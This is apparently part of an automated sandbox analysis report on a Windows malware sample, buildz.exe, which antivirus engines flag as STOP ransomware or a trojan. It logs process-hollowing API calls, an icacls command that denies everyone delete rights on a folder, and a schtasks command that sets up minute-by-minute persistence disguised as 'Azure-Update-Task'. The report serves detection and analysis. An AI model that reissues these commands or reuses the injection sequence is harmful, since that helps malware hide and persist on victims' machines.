Process injection	Process 2596 resumed a thread in remote process 2804
Process injection	Process 2804 resumed a thread in remote process 2884
Process injection	Process 3000 resumed a thread in remote process 3044
Process injection	Process 2108 resumed a thread in remote process 2252
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2596	1	0	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2804	1	0	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2884	1	0	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x000000a4 suspend_count: 1 process_identifier: 3044	1	0	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2252	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\8af848a7-33ae-45f8-8f88-48d3e6a644c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (34 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2600 thread_handle: 0x0000007c process_identifier: 2596 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\buildz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\buildz.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\buildz.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection March 29, 2024, 7:46 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2596 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2596 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2596 process_handle: 0x00000080	1	1
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2596	1	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2596	1	0
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2752 thread_handle: 0x00000300 process_identifier: 2748 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\8af848a7-33ae-45f8-8f88-48d3e6a644c8" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000004f0	1	1
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2808 thread_handle: 0x000002c4 process_identifier: 2804 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\buildz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\buildz.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002cc	1	1
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2804	1	0
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2888 thread_handle: 0x0000007c process_identifier: 2884 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\buildz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\buildz.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection March 29, 2024, 7:46 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2884 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2884 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2884 process_handle: 0x00000080	1	1
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2884	1	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2884	1	0
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 3004 thread_handle: 0x000002cc process_identifier: 3000 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe" filepath_r: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c4	1	1
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2100 thread_handle: 0x0000065c process_identifier: 2108 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe" filepath_r: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000670	1	1
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 3048 thread_handle: 0x000000a4 process_identifier: 3044 current_directory: filepath: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe" filepath_r: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000a8	1	1
NtGetContextThread March 29, 2024, 7:46 a.m.	thread_handle: 0x000000a4	1	0
NtUnmapViewOfSection March 29, 2024, 7:46 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 3044 process_handle: 0x000000a8	1	0
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 3044 region_size: 2375680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000a8	1	0
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3044 process_handle: 0x000000a8	1	1
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4281957 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000a4 process_identifier: 3044	1	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x000000a4 suspend_count: 1 process_identifier: 3044	1	0
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2248 thread_handle: 0x0000007c process_identifier: 2252 current_directory: filepath: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe" filepath_r: C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection March 29, 2024, 7:46 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2252 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2252 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2252 process_handle: 0x00000080	1	1
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2252	1	0
NtResumeThread March 29, 2024, 7:46 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2252	1	0
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2456 thread_handle: 0x000000ac process_identifier: 2440 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Convagent.i!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
CAT-QuickHeal	Ransom.Stop.P5
Skyhigh	BehavesLike.Win32.Lockbit.bc
Cylance	unsafe
Sangfor	Trojan.Win32.Save.a
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
APEX	Malicious
McAfee	Artemis!B63EEAAF33DF
Avast	PWSX-gen [Trj]
ClamAV	Win.Packer.pkr_ce1a-9980177-0
Kaspersky	UDS:DangerousObject.Multi.Generic
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.b63eeaaf33df089b
Sophos	Troj/Krypt-VK
Ikarus	Trojan.Win32.Danabot
Google	Detected
Kingsoft	malware.kb.a.1000
Gridinsoft	Ransom.Win32.STOP.tr
Microsoft	Trojan:Win32/Znyonm
ZoneAlarm	UDS:DangerousObject.Multi.Generic
AhnLab-V3	Trojan/Win.Generic.R641315
BitDefenderTheta	Gen:NN.ZexaF.36802.Vq0@a4iRyjhG
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Tencent	Trojan.Win32.Obfuscated.gen
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Kryptik.HWMW!tr
AVG	PWSX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (D)

buildz.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All